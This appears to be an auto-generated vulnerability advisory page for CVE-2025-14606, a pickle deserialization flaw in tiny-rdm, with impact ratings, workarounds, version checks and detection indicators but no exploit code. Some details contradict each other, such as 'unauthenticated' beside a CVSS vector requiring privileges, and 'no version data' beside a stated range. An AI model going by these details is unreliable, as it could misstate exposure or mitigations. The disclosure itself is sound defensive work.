CVE-2025-14606

5.0 MEDIUM

Remote Code Execution Deserialization

📋 TL;DR

This vulnerability allows remote attackers to execute arbitrary code through insecure deserialization in tiny-rdm's pickle decoding functionality. Attackers can exploit pickle.loads in pickle_convert.go to achieve remote code execution. Users of tiny-rdm up to version 1.2.5 are affected.

💻 Affected Systems

Products:

• tiny-rdm Tiny RDM

Versions: Up to and including version 1.2.5

Operating Systems: All platforms where tiny-rdm runs

Default Config Vulnerable: ⚠️ Yes

Notes: All deployments using affected versions are vulnerable regardless of configuration.

⚠️ Manual Verification Required

This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.

Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).

🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.

Recommended Actions:

1. Review the CVE details at NVD
2. Check vendor security advisories for your specific version
3. Test if the vulnerability is exploitable in your environment
4. Consider updating to the latest version as a precaution

⚠️ Risk & Real-World Impact

🔴

Worst Case

Remote code execution leading to complete system compromise, data theft, and lateral movement within the network.

🟠

Likely Case

Remote code execution with attacker gaining the same privileges as the tiny-rdm process, potentially leading to data exposure and further system exploitation.

🟢

If Mitigated

Limited impact if proper network segmentation and least privilege principles are applied, though deserialization attacks could still cause service disruption.

🌐 Internet-Facing: HIGH - Attack can be initiated remotely and exploit has been publicly disclosed, making internet-facing instances particularly vulnerable.

🏢 Internal Only: MEDIUM - While still vulnerable, internal-only deployments have reduced attack surface compared to internet-facing instances.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: MEDIUM

Exploit has been publicly disclosed and may be used, though the vulnerability requires some technical knowledge to exploit effectively.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Not available

Vendor Advisory: Not available

Restart Required: Yes

Instructions:

1. Monitor the tiny-rdm GitHub repository for security updates. 2. When a patched version becomes available, upgrade immediately. 3. Restart the tiny-rdm service after patching.

🔧 Temporary Workarounds

Network Isolation

all

Restrict network access to tiny-rdm instances to only trusted sources

Copy

Use firewall rules to limit inbound connections to tiny-rdm port (default 6379)

Process Isolation

linux

Run tiny-rdm with minimal privileges in a container or isolated environment

Copy

docker run --read-only --cap-drop=ALL tiny-rdm

🧯 If You Can't Patch

• Implement strict network segmentation to isolate vulnerable instances
• Monitor for suspicious pickle deserialization attempts and implement application-level input validation

🔍 How to Verify

Check if Vulnerable:

Copy

Check tiny-rdm version: tiny-rdm --version or examine package version. If version is 1.2.5 or earlier, system is vulnerable.

Check Version:

Copy

tiny-rdm --version

Verify Fix Applied:

Copy

After patching, verify version is above 1.2.5 and test pickle deserialization functionality with safe test data.

📡 Detection & Monitoring

Log Indicators:

• Unusual pickle deserialization errors
• Unexpected process spawns from tiny-rdm
• Network connections to suspicious external IPs

Network Indicators:

• Malformed pickle data sent to tiny-rdm port
• Unexpected outbound connections from tiny-rdm process

SIEM Query:

Copy

process:tiny-rdm AND (event:deserialization_error OR process_spawn:unexpected)

📊 Metadata

CVE ID: CVE-2025-14606

CVSS v3 Score: 5.0 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L

CWE: CWE-20

EPSS Score: 0.05% exploit probability (16th percentile)

Published: December 13, 2025

Last Updated: December 15, 2025

🔗 References

• https://github.com/tiny-craft/tiny-rdm/issues/512
• https://vuldb.com/?ctiid.336282
• https://vuldb.com/?id.336282
• https://vuldb.com/?submit.704138

📤 Share & Export

Twitter LinkedIn Reddit Copy Link

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-14606, you might also want to check these:

CVE-2022-47190 10.0

CVE-2022-47190 allows remote attackers to upload malicious firmware containing a webshell to Generex...

Same vulnerability type (CWE-20)

CVE-2020-12388 10.0

This vulnerability allows attackers to escape Firefox's content process sandbox on Windows systems, ...

Same vulnerability type (CWE-20)

CVE-2024-3400 10.0

CVE-2024-3400 is a critical command injection vulnerability in Palo Alto Networks PAN-OS GlobalProte...

Same vulnerability type (CWE-20)